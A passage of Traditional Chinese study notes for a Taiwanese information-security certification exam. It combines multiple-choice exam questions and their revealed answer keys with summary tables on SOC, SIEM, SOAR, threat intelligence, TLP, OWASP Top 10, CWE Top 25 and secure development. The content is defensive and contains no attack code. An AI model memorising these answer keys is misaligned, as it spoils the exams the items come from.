災難復原計畫（DRP）專注於資訊技術系統的恢復，而業務持續性計畫（BCP）和資訊系統應急準備計畫（ISCP）則專注於組織的整體運營恢復 > - \(B\) 資訊系統應急準備計畫（ISCP）涵蓋整個組織的業務和資訊系統恢復策略，而災難復原計畫（DRP）和業務持續性計畫（BCP）則關注於特定技術解決方案 > - \(C\) 業務持續性計畫（BCP）專注於資訊技術系統的恢復，而災難復原計畫（DRP）和資訊系統應急準備計畫（ISCP）則專注於組織的整體運營恢復 > - \(D\) 災難復原計畫（DRP）專注於資訊技術系統的恢復，業務持續性計畫（BCP）涵蓋組織整體的業務運營持續性，而資訊系統應急準備計畫（ISCP）則專注於特定資訊系統的應急反應 <details> <summary>查看答案</summary> **\(D\) 災難復原計畫（DRP）專注於資訊技術系統的恢復，業務持續性計畫（BCP）涵蓋組織整體的業務運營持續性，而資訊系統應急準備計畫（ISCP）則專注於特定資訊系統的應急反應** 範圍大小：BCP（整體業務）> DRP（IT 系統）> ISCP（特定系統） </details> --- > **Q：** 有關「網頁應用程式防火牆（Web Application Firewall，WAF）」的描述，下列何者較為適切？ > - \(A\) WAF 主要用於過濾電子郵件內容，防止垃圾郵件 > - \(B\) WAF 的規則有機會被攻擊者繞過，無法完全阻擋網頁攻擊 > - \(C\) WAF 只能用來防止 OWASP Top 10 2021 裡面的 A03:2021 Injection > - \(D\) WAF 只能阻擋已知特徵的 SQL 注入攻擊，但是特徵必須一模一樣，如果特徵稍微有變化 WAF 就無法阻擋 <details> <summary>查看答案</summary> **\(B\) WAF 的規則有機會被攻擊者繞過，無法完全阻擋網頁攻擊** - A 錯：WAF 防護 Web 攻擊，不是過濾郵件 - B 對：WAF 基於規則，攻擊者可透過編碼、變形等方式繞過 - C 錯：WAF 可防多種 Web 攻擊，不只 Injection - D 錯：WAF 有模糊比對能力，不是「一模一樣」才能擋 </details> --- > **Q：** 安全營運中心（SOC）接獲終端偵測與回應（EDR）警報，指出某個人電腦端點可能執行 Cobalt Strike Beacon。為在不影響業務的前提下「快速遏制」並「保全證據」，第一時間最適合採取下列何項作法？ > - \(A\) 立即關閉端點電源 > - \(B\) 啟動端點重灌電腦 > - \(C\) 隔離端點網路，並同時擷取 RAM 與磁碟的鑑識鏡像 > - \(D\) 啟動端點防毒進行全碟掃描 <details> <summary>查看答案</summary> **\(C\) 隔離端點網路，並同時擷取 RAM 與磁碟的鑑識鏡像** - A 錯：關閉電源會失去 RAM 中的揮發性證據（記憶體內容、網路連線狀態） - B 錯：重灌會完全破壞所有證據 - C 對：**隔離網路**（遏制）+ **擷取 RAM 與磁碟鏡像**（保全證據），符合事件處理原則 - D 錯：防毒掃描可能修改或刪除檔案，破壞證據完整性 > 證據揮發性順序：RAM > 網路連線 > 硬碟，應優先保全揮發性高的證據 </details> --- > **Q：** 依據美國國家標準技術研究院（NIST）特別出版品 800-34（SP 800-34）中的相關規定，在進行業務衝擊分析（Business Impact Analysis, BIA）時，下列何項最能正確描述 BIA 的核心目標？ > - \(A\) 評估資訊系統的技術漏洞，以便制定防護策略 > - \(B\) 確定關鍵業務流程及其對資源中斷的影響，並設定復原優先級 > - \(C\) 開發系統架構以確保業務流程的持續性 > - \(D\) 測試災難復原計劃的可行性，並提供改進建議 <details> <summary>查看答案</summary> **\(B\) 確定關鍵業務流程及其對資源中斷的影響，並設定復原優先級** - A 錯：評估技術漏洞是弱點評估，不是 BIA - B 對：BIA 核心目標 = 識別關鍵業務 + 評估中斷影響 + 設定復原優先級 - C 錯：開發系統架構是後續的解決方案，不是 BIA 本身 - D 錯：測試 DRP 是演練階段，不是 BIA </details> --- > **Q：** 【題組 3】情境如附圖所示。某關鍵基礎設施組織近日遭受新型勒索軟體攻擊，導致部分 OT 系統和生產控制面臨停擺威脅。資安營運中心（Security Operations Center, SOC）在事件回應中，針對此類涉及 OT 的勒索軟體事件處理優先序，下列何者較為適切？ > > **情境**：近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。 > > - \(A\) 由於勒索軟體通常只影響特定檔案，且 OT 系統穩定性優先，應優先進行系統備份，然後等待 OT 維運團隊排程處理，避免額外干擾 > - \(B\) 勒索軟體屬一般惡意軟體，主要任務是收集鑑識證據以追溯攻擊者，OT 系統的影響可稍後評估 > - \(C\) 此類事件優先序極高，可能對實體安全和關鍵業務營運造成嚴重中斷，需立即啟動遏制與恢復措施，並與 OT 擁有者密切合作 > - \(D\) 優先順序取決於是否支付贖金，若已決定支付則回應優先順序可降低，以便與攻擊者協商 <details> <summary>查看答案</summary> **\(C\) 此類事件優先序極高，可能對實體安全和關鍵業務營運造成嚴重中斷，需立即啟動遏制與恢復措施，並與 OT 擁有者密切合作** - A 錯：OT 環境遭勒索軟體攻擊影響重大（可能造成實體安全風險），不能被動等待排程處理 - B 錯：OT 系統影響「不能」稍後評估，勒索軟體對 OT 可造成生產停擺、安全事故 - C 對：OT + 勒索軟體 = **最高優先序**，立即遏制 + 與 OT 擁有者合作 - D 錯：**絕不應以支付贖金為考量**，且支付贖金不代表可降低回應優先序 > OT 環境特性：影響實體安全（如工廠、電力、水利），事件回應需與 OT 專業人員協調 </details> --- > **Q：** 【題組 3】情境如附圖所示。鑑於近期持續不斷的 APT 攻擊，資安營運中心（Security Operations Center, SOC）在利用網路威脅情資（Cyber Threat Intelligence, CTI）時，對於採用 MITRE ATT&CK 這類框架的主要價值，下列描述何者最為正確？ > > **情境**：近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。 > > - \(A\) MITRE ATT&CK 提供詳盡的特定攻擊者 IP 位址和網域名稱列表，便於 SOC 立即封鎖，是唯一實用的情資來源 > - \(B\) MITRE ATT&CK 能夠自動且絕對地將攻擊歸因於特定國家級行為者，簡化歸因過程，減少分析師工作量 > - \(C\) MITRE ATT&CK 的主要目的是為 SOC 提供自動化的威脅偵測工具，取代人工分析師的判斷，達到全面自動化 > - \(D\) MITRE ATT&CK 提供一套基於真實世界觀察的威脅者戰術、技術與程序（TTPs）知識庫，有助於 SOC 理解威脅者行為模式 <details> <summary>查看答案</summary> **\(D\) MITRE ATT&CK 提供一套基於真實世界觀察的威脅者戰術、技術與程序（TTPs）知識庫，有助於 SOC 理解威脅者行為模式** - A 錯：ATT&CK 提供的是 **TTP（行為模式）**，不是 IP/網域等 IoC（Indicator of Compromise） - B 錯：ATT&CK **無法**「自動且絕對地」歸因到特定國家，歸因需要綜合分析 - C 錯：ATT&CK 是知識庫，用於**輔助**分析師，不是取代人工判斷 - D 對：ATT&CK 核心價值 = **TTP 知識庫**，幫助 SOC 理解攻擊者行為模式、改善偵測規則 > MITRE ATT&CK = Tactic（戰術）+ Technique（技術）+ Procedure（程序） </details> --- > **Q：** 【題組 3】情境如附圖所示。隨著企業逐步採用雲端服務與遠端工作模式，對端點偵測與回應（Endpoint Detection and Response, EDR）工具在資安監控中的作用日益凸顯。關於 EDR 能力對資安營運中心（Security Operations Center, SOC）在偵測與確認入侵方面的價值，下列描述何者最為正確？ > > **情境**：近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。 > > - \(A\) EDR 主要用於監控網路流量，以發現已知惡意程式碼的特徵碼，與傳統 IDS 無異 > - \(B\) EDR 提供的資訊與傳統網路流量資料相比，在確認入侵方面較不具參考價值，因為它可能被攻擊者規避 > - \(C\) EDR 系統提供來自端點的強大偵測和豐富的監控數據，使其資料在確認入侵方面通常比網路流量資料更具資訊性 > - \(D\) EDR 僅是一種傳統防毒解決方案的升級版，不具備進階威脅偵測能力，無法應對 APT 級攻擊 <details> <summary>查看答案</summary> **\(C\) EDR 系統提供來自端點的強大偵測和豐富的監控數據，使其資料在確認入侵方面通常比網路流量資料更具資訊性** - A 錯：EDR 監控「**端點**」而非網路流量；使用「**行為分析**」而非僅特徵碼比對 - B 錯：EDR 提供的端點資料（程序執行、檔案變更、記憶體活動）在確認入侵方面**非常有價值** - C 對：EDR 核心優勢 = 端點層級的豐富監控數據，比網路流量更能看到攻擊者在端點上的實際行為 - D 錯：EDR **不是**防毒升級版，具備行為偵測、威脅獵捕、事件調查等進階能力，可應對 APT </details> --- ## 4.1 安全維運 ### SecOps（Security Operations） 現代化安全維運的關鍵元素： | 元素 | 說明 | |:-----|:-----| | SIEM | 日誌收集、關聯分析、告警 | | SOAR | 自動化編排與回應 | | 威脅情資 | 外部情資支援決策 | | SOC | 人員團隊持續監控與回應 | ### 日誌管理 **時間同步（NTP）**：確保各系統時間一致，日誌時序正確才能有效進行事件關聯分析 **Windows Event ID**： | Event ID | 意義 | |:---------|:-----| | 4624 | 登入成功 | | 4625 | 登入失敗 | | 1102 | 日誌被清除 | | 4720 | 新帳號建立 | **Syslog 嚴重度**（數字越小越嚴重）： | 等級 | 名稱 | |:-----|:-----| | 0 | Emergency | | 1 | Alert | | 2 | Critical | | 3 | Error | | 4 | Warning | | 5 | Notice | | 6 | Informational | | 7 | Debug | ### SIEM 功能：日誌收集、正規化、即時關聯分析、告警、合規報表 **SIEM 日誌收集方式**： | 方式 | 說明 | |:-----|:-----| | Syslog | 標準日誌協定，Linux/網路設備原生支援 | | Agent-Based | 安裝代理程式收集並傳送 | | WEF | Windows Event Forwarding，Windows 原生功能 | | API | 透過 API 整合雲端服務日誌 | ### SIEM **功能**： - 收集企業內外日誌、警報、事件 - 事件關聯分析、行為分析、異常偵測 - 依規則進行事件識別、分析和報警 - 事件儲存、查詢、報表生成、調查和取證 ### SOC 運作 **功能**： - 持續監控企業資訊系統、網路和應用 - 識別並即時回應安全事件 - 提供資安事件報告、紀錄、追蹤、分析和統計 > ⚠️ SOC 需要多種工具配合（SIEM、EDR、IDS 等），非單一產品能達成 ### SOAR **SOAR（Security Orchestration, Automation, and Response）**： | 功能 | 說明 | |:-----|:-----| | Orchestration（編排） | 整合多種資安工具協同運作 | | Automation（自動化） | 自動執行重複性任務 | | Response（回應） | 自動化事件回應流程 | ### 威脅情資（Threat Intelligence） **情資內容**： - 攻擊手法、漏洞利用方式 - 事件造成之實際損害或潛在負面影響 - IoC（Indicator of Compromise）：惡意 IP、Hash、網域 **ISAC（資訊分享與分析中心）**： | ISAC | 適用對象 | |:-----|:---------| | F-ISAC | 金融業 | | H-ISAC | 醫療業 | | TWCERT/CC | 一般企業 | **TLP（Traffic Light Protocol，紅綠燈協定）**： | 等級 | 分享範圍 | |:-----|:---------| | TLP:RED | 僅限收件者本人，不得進一步揭露 | | TLP:AMBER | 組織內部使用，必要時可分享給客戶 | | TLP:GREEN | 可於相關社群內散播 | | TLP:CLEAR | 無限制，可公開散播 | --- ### 114 年考題補充 > **Q：** 資料庫伺服器時間校正功能發生狀況的風險問題，最應加強下列哪幾項控制措施？（複選） > - \(A\) 事件分析 > - \(B\) 時間同步 > - \(C\) 網路連通監控 > - \(D\) 存取控制 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：時間不同步會導致日誌時序錯亂，影響事件分析 - B 對：直接解決時間校正問題（如 NTP） - C 對：確保時間同步服務（NTP）的網路連通 - D 錯：存取控制與時間校正無直接關聯 </details> --- > **Q：** 在網站憑證使用風險對策上，下列何者最「不」適切？ > - \(A\) 外部網站憑證必須要納入資訊資產，確保其可用性 > - \(B\) 內部系統網站，也必須要採用外部簽發的憑證 > - \(C\) 網站憑證的簽發單位也必須納入風險評估的一環 > - \(D\) 網站憑證必須要設定到期前提醒之巡查流程 <details> <summary>查看答案</summary> **\(B\) 內部系統網站，也必須要採用外部簽發的憑證** - A 對：憑證是資產，需管理其可用性（避免過期） - B 錯：內部網站可用內部 CA 簽發憑證，不一定要外部 - C 對：CA 的安全性需納入風險評估 - D 對：憑證到期會造成服務中斷，需設定提醒 </details> --- > **Q：** 安全性資訊與事件管理（Security Information and Event Management，SIEM）是蒐集、分析、關聯日誌，並且提供即時的警報與威脅檢測，可針對事件回溯與調查，當我們設定要將一台 Windows Server 2019 的安全性事件，拋送回到 SIEM 進行分析，可以透過下列哪些通訊協定無需額外的透過 cmd 指令串接、設定、組態即可傳送？（複選） > - \(A\) Syslog（System Logging Protocol） > - \(B\) SNMP（Simple Network Management Protocol） > - \(C\) Agent-Based > - \(D\) Windows Event Forwarding（WEF） <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** - A 對：Syslog 是標準日誌協定，SIEM 普遍支援 - B 錯：SNMP 主要用於網路設備管理，不適合傳送安全事件日誌 - C 對：Agent-Based 安裝代理程式後可直接收集傳送 - D 對：WEF 是 Windows 原生功能，可透過 GUI 設定 </details> --- > **Q：** 【題組 2】情境如附圖所示。鑒於防火牆 EOS 的事件，該公司資安長非常重視事前資通安全情資的蒐集與分析，俾利公司能有足夠的時間來因應突發的資訊安全風險發生。試問有關資安人員對於資通安全情資的蒐集與分析作為，下列哪些正確？（複選） > > **情境**：A 公司為一金融機構（資通安全責任等級 A 級），近期因為駭客攻擊事件頻仍，因此該公司資安長要求內部必須針對目前外在資安環境以及內部資訊資產的變化，重新檢視與評估潛在的風險並於以適切之處理，以確保該公司的資訊安全。 > > - \(A\) 資通安全情資包含使資通系統安全控制措施無效或利用安全漏洞之方法在內 > - \(B\) 資通安全情資包含資通安全事件造成之實際損害或可能產生之負面影響在內 > - \(C\) 加入衛生福利部資安資訊分享與分析中心（H-ISAC）平台 > - \(D\) 加入金融資安資訊分享與分析中心（F-ISAC）平台 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：情資包含攻擊手法、漏洞利用方式 - B 對：情資包含事件損害與負面影響評估 - C 錯：H-ISAC 是醫療業，金融機構應加入 F-ISAC - D 對：金融機構應加入 F-ISAC 取得相關情資 </details> --- > **Q：** 某「安全性資訊與事件管理」（簡稱 SIEM）系統依照 The Syslog Protocol（RFC5424）標準設計，因事件眾多，希望只顯示必須立即採取行動或系統無法使用，這類極為嚴重的訊息在特定的畫面上，請問其篩選條件下列何者最為合適？ > - \(A\) Severity <= 1 > - \(B\) Severity <= 3 > - \(C\) Severity <= 5 > - \(D\) Severity <= 7 <details> <summary>查看答案</summary> **\(A\) Severity <= 1** Syslog 嚴重度數字越小越嚴重： - 0 = Emergency（系統無法使用） - 1 = Alert（必須立即採取行動） Severity <= 1 只顯示最嚴重的兩個等級。 </details> --- > **Q：** 【題組 3】情境如附圖所示。該公司評估團隊針對資安監控維運中心先進行初步的任務界定，試問下列關於資安監控維運中心的敘述何者最「不」適切？ > > **情境**：某公司為因應潛在的資安威脅，而設立資安監控維運中心（Security Operations Center，SOC），並擬採購相關軟硬體及資安解決方案。 > > - \(A\) 持續監控企業的資訊系統、網路和應用 > - \(B\) 負責對識別到的安全事件進行及時回應和管理 > - \(C\) 提供有關資訊安全事件的報告、紀錄、追蹤、分析和統計 > - \(D\) 可以透過導入單一產品的方式來達成所設定的目標 <details> <summary>查看答案</summary> **\(D\) 可以透過導入單一產品的方式來達成所設定的目標** SOC 需要多種工具配合（SIEM、EDR、IDS、防火牆等），無法透過單一產品達成所有目標。 </details> --- > **Q：** 【題組 3】情境如附圖所示。該公司評估團隊認為安全資訊與事件管理（Security Information and Event Management）對公司的資安監控維運中心是重要的基礎設施，下列關於安全資訊與事件管理的功能敘述，何項最「不」適切？ > > **情境**：某公司為因應潛在的資安威脅，而設立資安監控維運中心（Security Operations Center，SOC），並擬採購相關軟硬體及資安解決方案。 > > - \(A\) 能夠監控企業內外的資訊安全事件，包括日誌（logs）、警報（alerts）、事件（events）等 > - \(B\) 可以從多個資源中收集、匯聚和分析這些事件，並應用預先設定的規則和策略進行事件的識別、分析和報警 > - \(C\) 缺乏對事件進行關聯分析、行為分析、異常偵測等技術 > - \(D\) 可以自動儲存和管理所有收集到的事件資訊，並提供事件查詢、報表生成、事件調查和取證等功能 <details> <summary>查看答案</summary> **\(C\) 缺乏對事件進行關聯分析、行為分析、異常偵測等技術** SIEM 的核心功能就是關聯分析、行為分析、異常偵測，C 選項描述相反。 </details> --- > **Q：** 【題組 3】情境如附圖所示。該公司的資安顧問建議可以考慮 SOAR 方案，經其評估團隊了解，SOAR 可以簡單理解為具有自動化功能的進階式平台，旨在幫助企業更有效地回應和解決資安問題，以實現更全面和智慧化的資安管理。請問下列何項最「不」是 SOAR 具備的功能？ > > **情境**：某公司為因應潛在的資安威脅，而設立資安監控維運中心（Security Operations Center，SOC），並擬採購相關軟硬體及資安解決方案。 > > - \(A\) 安全編排（Orchestration） > - \(B\) 安全設計（Security Design） > - \(C\) 自動化（Automation） > - \(D\) 即時回報（Response） <details> <summary>查看答案</summary> **\(B\) 安全設計（Security Design）** SOAR = Security **O**rchestration, **A**utomation, and **R**esponse 安全設計（Security Design）不是 SOAR 的功能。 </details> --- > **Q：** 【題組 3】情境如附圖所示。該公司評估人員為借鑑業界的成功案例，蒐集相關資料，從雲端服務公司的資安維運經驗而言，現代化安全維運模式（SecOps）重要的關鍵元素應包含下列哪些項目？（複選） > > **情境**：某公司為因應潛在的資安威脅，而設立資安監控維運中心（Security Operations Center，SOC），並擬採購相關軟硬體及資安解決方案。 > > - \(A\) 安全資訊和事件管理（SIEM） > - \(B\) 資安協作自動化應變（SOAR） > - \(C\) 安全應用系統開發周期（SSDLC） > - \(D\) 威脅情資（Threat Intelligence） <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：SIEM 是 SecOps 核心工具 - B 對：SOAR 自動化回應是 SecOps 關鍵 - C 錯：SSDLC 是「開發」階段，非「維運」階段 - D 對：威脅情資支援 SecOps 決策 </details> --- > **Q：** 若安全營運中心（SOC）於內部 DNS 伺服器偵測到大量指向 *.onion 的查詢，但防火牆尚未攔阻，下列何項即時防禦措施最符合效率及不影響正常服務運作？ > - \(A\) 直接封鎖所有 53/TCP 與 53/UDP 流量 > - \(B\) 通知使用者可能違反政策，待其自我修正 > - \(C\) DNS 層將可疑頂級網域（Top-Level Domain, TLD）解析為內部黑洞（sinkhole）IP > - \(D\) 調高 DNS 服務優先權，以降低查詢逾時 <details> <summary>查看答案</summary> **\(C\) DNS 層將可疑頂級網域（Top-Level Domain, TLD）解析為內部黑洞（sinkhole）IP** - A 錯：封鎖所有 53 埠流量會導致正常 DNS 查詢失敗，影響所有服務 - B 錯：被動通知無法即時遏制威脅 - C 對：**DNS Sinkhole** 將惡意網域解析到內部控制的 IP，既能阻斷惡意連線，又不影響正常服務 - D 錯：調整優先權與安全防禦無關 > *.onion 是 Tor 暗網網域，大量查詢可能表示惡意程式嘗試連線 C2 伺服器 </details> --- > **Q：** H 公司於上周發生公司 email 超過 4 個小時以上無法收發的資安事件，經 MIS 人員處理後發現，郵件伺服器因硬碟空間不足而無法正常運作，並由追蹤相關記錄中找出服務中斷前，系統正在處理一封寄給全公司 2000 位同仁的內部公告郵件，其之中被夾帶著 4GB 的附檔，但此附檔在防毒軟體和沙箱工具檢查後並無病毒或威脅性，刪除此郵件及相關衍生作業後，郵件伺服器恢復正常運作，檢討此次內部資安攻擊事件，確認為人員操作失誤所致。請問下列何項措施「無法」防範此類事件再度發生？（複選） > - \(A\) 儘快增購郵件伺服器的硬碟容量，避免再發生相同空間不足的問題再度發生 > - \(B\) 對員工加強資安教育訓練，避免錯誤的資訊系統操作行為 > - \(C\) 增加防火牆檢查細則，減少大量或敏感資料的傳輸與攻擊事件 > - \(D\) 郵件伺服器增設郵件處理容量限制，阻絕大檔案的傳送服務 <details> <summary>查看答案</summary> **\(A\)\(C\)** 根因是「人員操作失誤寄送 4GB 附檔」： - A 錯：增購硬碟只是治標，無法防止下次再寄大檔案 - B 對：教育訓練可減少人員操作失誤 - C 錯：防火牆檢查是針對外部威脅，此為內部郵件問題 - D 對：限制附檔大小可直接防止此類事件 </details> --- > **Q：** 如附圖所示。各地區/領域之電腦緊急應變小組（Computer Emergency Response Team, CERT）與電腦資安事件應變小組（Computer Security Incident Response Team, CSIRT），常透過紅綠燈協定（Traffic Light Protocol, TLP）來促進敏感資訊如威脅情資之分享與有效協作，關於紅綠燈協定之敘述，下列何者「最不正確」？ > >  > > - \(A\) TLP:RED 僅供收件者本人查閱或聆聽，不得進一步揭露 > - \(B\) TLP:AMBER 收件者僅於組織內使用，且任何狀況都不得對客戶散播 > - \(C\) TLP:GREEN 收件者可於相關事件的特定社群中散播資訊 > - \(D\) TLP:CLEAR 收件者可以將此類資訊散播至任何地方，對揭露沒有限制 <details> <summary>查看答案</summary> **\(B\) TLP:AMBER 收件者僅於組織內使用，且任何狀況都不得對客戶散播** - A 對：TLP:RED 僅限收件者本人 - B 錯：TLP:AMBER 可於組織內使用，**必要時可分享給客戶**以保護其安全，非「任何狀況都不得」 - C 對：TLP:GREEN 可於相關社群散播 - D 對：TLP:CLEAR 無限制 </details> --- > **Q：** 在網路安全的資安監控機制中，其一方式為使用身份驗證事件閾值（Authentication Event Thresholding）來識別異常使用者行為，透過收集身份驗證事件，來建立使用者活動基準，並分析身份驗證事件是否一致來而達成偵測。關於可作為身份驗證事件閾值的資料來源敘述，下列何者最為適切？（複選） > - \(A\) 虛擬私人網路（Virtual private network, VPN）伺服器日誌檔 > - \(B\) 網路流量（Network flow）日誌檔 > - \(C\) 身份與存取管理（Identity and access management, IDAM）日誌檔 > - \(D\) 輕量型目錄存取通訊協定（Lightweight directory access protocol, LDAP）網路傳輸量 <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** 身份驗證事件閾值需要收集「身份驗證相關」的資料來源： - A 對：VPN 伺服器日誌記錄遠端登入驗證事件 - B 錯：Network flow 記錄網路流量統計，**不直接記錄身份驗證事件** - C 對：IDAM 日誌直接記錄身份驗證與存取管理事件 - D 對：LDAP 用於目錄服務認證查詢（如 AD），可追蹤驗證活動 </details> --- > **Q：** 【題組 3】情境如附圖所示。某組織正計畫建立一個符合其未來需求的資安營運中心（Security Operations Center, SOC），並考慮納入雲端與營運技術（OT）環境的監控，以應對日益複雜的網路攻擊。在建立 SOC 過程中應處理或採納的關鍵考量或功能，下列描述哪些最正確？（複選） > > **情境**：近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。 > > - \(A\) 根據組織的規模、業務需求以及預期提供的服務範圍，建立適當的 SOC 組織架構，包括是否涵蓋雲端、行動和營運技術（OT）環境的監控與回應職責 > - \(B\) 實做全面的網路威脅情資（CTI）計畫，以深入理解威脅者（包含其戰術、技術與程序 TTPs），並依據對其分析來調整偵測、防禦措施，並支援威脅狩獵 > - \(C\) 建立績效衡量指標需聚焦於 SOC 對組織外部形象的正面影響，內部運作效率可於事後再視情況補充評估 > - \(D\) 透過標準作業程序（SOPs）和應急手冊，明確定義事件類別、回應步驟和升級路徑，並根據事件對業務的潛在影響來優先處理事件回應，以確保在危機時刻能迅速且精準行動 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：SOC 架構應依組織需求設計，涵蓋 IT、雲端、OT、行動裝置等環境 - B 對：CTI（威脅情資）+ TTP 分析 → 調整偵測規則、支援威脅狩獵 - C 錯：績效指標應聚焦於「**安全效能**」（如 MTTD、MTTR），而非「外部形象」 - D 對：SOP + 應急手冊 → 明確事件分類、回應步驟、升級路徑，依業務影響排定優先序 > SOC 建立關鍵：組織架構 + 威脅情資 + 標準程序 + 績效衡量（內部效能導向） </details> --- ## 4.2 滲透測試、源碼測試、資安健診 ### 弱點修補 **弱點修補管理流程**： 1. 弱點掃描 2. 評估：風險等級、實際影響程度、是否有已知 Exploit、停機對業務影響 3. 排定修補優先序與時程 4. 測試與部署修補 5. 驗證修補成效 > ⚠️ 即使無官方 Patch，仍應評估緩解措施（如關閉服務、網路隔離） ### 測試類型 | 類型 | 測試者知識 | 特點 | |------|------------|------| | 黑箱 | 無內部資訊 | 模擬真實攻擊 | | 白箱 | 完整資訊 | 涵蓋率高 | | 灰箱 | 部分資訊 | 平衡效率與真實性 | ### 檢測技術 | 技術 | 說明 | 時機 | |------|------|------| | SAST（靜態） | 掃原始碼 | 開發初期 | | DAST（動態） | 測執行中應用 | 測試/正式環境 | | IAST（互動） | 結合 SAST + DAST | 測試環境 | | SCA（組成分析） | 掃第三方元件漏洞 | 整合 SBOM | **自動化工具侷限**：對客製化商業邏輯理解有限，需搭配人工測試 ### OWASP Top 10（2025） | 排名 | 弱點 | 備註 | |:-----|:-----|:-----| | A01 | Broken Access Control | 含 SSRF（原 A10 併入） | | A02 | Security Misconfiguration | 從 #5 上升 | | A03 | Software Supply Chain Failures | 新（取代 Vulnerable Components） | | A04 | Cryptographic Failures | | | A05 | Injection | | | A06 | Insecure Design | 社群票選 | | A07 | Identification and Authentication Failures | | | A08 | Software and Data Integrity Failures | | | A09 | Security Logging and Monitoring Failures | | | A10 | Mishandling of Exceptional Conditions | 新、社群票選 | > 8 個來自統計數據，2 個來自社群票選（A06、A10） ### CWE Top 25（2025） | 排名 | CWE ID | 弱點名稱 | 簡稱 | KEV 數 | |:-----|:-------|:---------|:-----|:-------| | 1 | CWE-79 | Improper Neutralization of Input During Web Page Generation | XSS | 7 | | 2 | CWE-89 | Improper Neutralization of Special Elements used in an SQL Command | SQL Injection | 4 | | 3 | CWE-352 | Cross-Site Request Forgery | CSRF | 0 | | 4 | CWE-862 | Missing Authorization | 缺少授權 | 0 | | 5 | CWE-787 | Out-of-bounds Write | 越界寫入 | 12 | | 6 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory | Path Traversal | 10 | | 7 | CWE-416 | Use After Free | 釋放後使用 | 14 | | 8 | CWE-125 | Out-of-bounds Read | 越界讀取 | 3 | | 9 | CWE-78 | Improper Neutralization of Special Elements used in an OS Command | OS Command Injection | 20 | | 10 | CWE-94 | Improper Control of Generation of Code | Code Injection | 7 | | 11 | CWE-120 | Buffer Copy without Checking Size of Input | Classic Buffer Overflow | 0 | | 12 | CWE-434 | Unrestricted Upload of File with Dangerous Type | 危險檔案上傳 | 4 | | 13 | CWE-476 | NULL Pointer Dereference | 空指標解參考 | 0 | | 14 | CWE-121 | Stack-based Buffer Overflow | 堆疊緩衝區溢位 | 4 | | 15 | CWE-502 | Deserialization of Untrusted Data | 不安全反序列化 | 11 | | 16 | CWE-122 | Heap-based Buffer Overflow | 堆積緩衝區溢位 | 6 | | 17 | CWE-863 | Incorrect Authorization | 授權不正確 | 4 | | 18 | CWE-20 | Improper Input Validation | 輸入驗證不當 | 2 | | 19 | CWE-284 | Improper Access Control | 存取控制不當 | 1 | | 20 | CWE-200 | Exposure of Sensitive Information to an Unauthorized Actor | 敏感資訊洩露 | 1 | | 21 | CWE-306 | Missing Authentication for Critical Function | 關鍵功能缺少驗證 | 11 | | 22 | CWE-918 | Server-Side Request Forgery | SSRF | 0 | | 23 | CWE-77 | Improper Neutralization of Special Elements used in a Command | Command Injection | 2 | | 24 | CWE-639 | Authorization Bypass Through User-Controlled Key | IDOR | 0 | | 25 | CWE-770 | Allocation of Resources Without Limits or Throttling | 資源耗盡 | 0 | > **KEV**：Known Exploited Vulnerabilities，表示該類弱點已有實際被利用的漏洞數量 > > **2025 新進榜**：CWE-120（#11）、CWE-121（#14）、CWE-122（#16）、CWE-284（#19） > > CWE Top 25 與 OWASP Top 10 互補：CWE 偏向底層程式碼弱點分類，OWASP 偏向 Web 應用風險情境 --- ### 安全開發（SSDLC） | 階段 | 安全活動 | |:-----|:---------| | 需求 | 安全需求分析 | | 設計 | 威脅建模 | | 開發 | 安全編碼、程式碼審查（SAST）、第三方元件檢測（SCA） | | 測試 | 滲透測試、弱點掃描（DAST） | | 部署 | 安全組態 | | 維運 | 監控、修補管理、WAF | **安全編碼原則**： | 攻擊類型 | 防禦方式 | |:---------|:---------| | XSS | Filter Input + Escape Output | | SQL Injection | Prepared Statement（參數化查詢）+ 輸入過濾 | | Command Injection | 白名單驗證、避免直接串接系統指令 | | 檔案上傳 | 限制副檔名、專屬目錄、設定不可執行 | > ⚠️ **前端驗證不可靠**：攻擊者可繞過前端直接發送請求，驗證必須在後端執行 ### 威脅建模（Threat Modeling） | 模型 | 說明 | |:-----|:-----| | STRIDE | 微軟提出，識別六大威脅類型 | | DREAD | 風險評分模型 | | VAST | 視覺化、敏捷式威脅建模 | --- ### 114 年考題補充 > **Q：** 在安全開發生命週期（Secure System Develop Life 